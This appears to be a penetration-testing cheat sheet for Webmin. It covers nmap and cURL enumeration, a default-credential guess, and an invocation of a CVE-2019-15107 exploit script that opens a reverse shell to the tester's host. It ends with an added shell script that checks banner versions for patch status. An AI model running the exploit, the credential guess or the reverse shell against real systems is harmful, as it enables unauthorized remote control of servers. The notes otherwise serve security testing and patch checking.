Webmin
Webmin (3.3k ⭐) is an open-source, web-based system administration interface for Linux systems. From the interface, we can:
- Manage packages
- Manage users
- Manage system configurations
- Manage network configurations
- ...
Port: 10000 (TCP)
To edit the DNS configuration, navigate to Networking > Network Configuration > Hostname and DNS Client.
Pentester Notes
Enumeration
- You can use nmap
$ nmap -p 10000 IP
10000/tcp open snet-sensor-mgmt
$ nmap -p 10000 -sV IP
10000/tcp open http syn-ack MiniServ 1.890 (Webmin httpd)
- You can use cURL too if you want to find the version
$ curl -s -I -k https://IP:10000 | grep Server
Server: MiniServ/1.890
Foothold
It might be worth testing admin:<blank> credentials.
Well-Known CVEs
- You may be able to exploit CVE-2019-15107
$ [...] # start a reverse shell listener
$ python3 webmin_exploit.py target_ip target_port host_ip host_port
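As an added example (not part of the original notes), the Server banner returned by the cURL check in the Enumeration section can be turned into a patch-status check for CVE-2019-15107. The function names and sample headers are constructed for illustration, and the 1.930 fixed release comes from the Webmin advisory rather than from this page.

```shell
#!/bin/sh
# Constructed sample response headers (not captured from a real host).
SAMPLE_OLD='HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Content-type: text/html; Charset=utf-8'
SAMPLE_NEW='HTTP/1.0 200 Document follows
Server: MiniServ/2.105'

# Print the MiniServ version from HTTP headers on stdin (empty if absent).
miniserv_version() {
    tr -d '\r' |
        sed -n 's/^[Ss]erver:[[:space:]]*MiniServ\/\([0-9][0-9.]*\).*$/\1/p' |
        head -n 1
}

# Classify a version against CVE-2019-15107, fixed in Webmin 1.930.
# Assumes Webmin's usual MAJOR.MINOR numbering (1.890, 1.920, 2.105).
cve_2019_15107_status() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) echo unknown; return 0 ;;   # malformed
        *.*) ;;
        *) echo unknown; return 0 ;;                         # no minor part
    esac
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    if [ "$major" -lt 1 ] || { [ "$major" -eq 1 ] && [ "$minor" -lt 930 ]; }; then
        echo affected
    else
        echo fixed
    fi
}

# Read headers on stdin, print "<version> <status>" for inventory or alerting.
check_webmin_banner() {
    v=$(miniserv_version)
    [ -n "$v" ] || { echo "none unknown"; return 0; }
    echo "$v $(cve_2019_15107_status "$v")"
}

# Live use: curl -s -I -k https://IP:10000 | check_webmin_banner
printf '%s\n' "$SAMPLE_OLD" | check_webmin_banner   # 1.890 affected
printf '%s\n' "$SAMPLE_NEW" | check_webmin_banner   # 2.105 fixed
```

A host reported as affected should be upgraded to 1.930 or later; the banner can be altered or hidden, so treat "fixed" and "unknown" results as a prompt to confirm the installed package version.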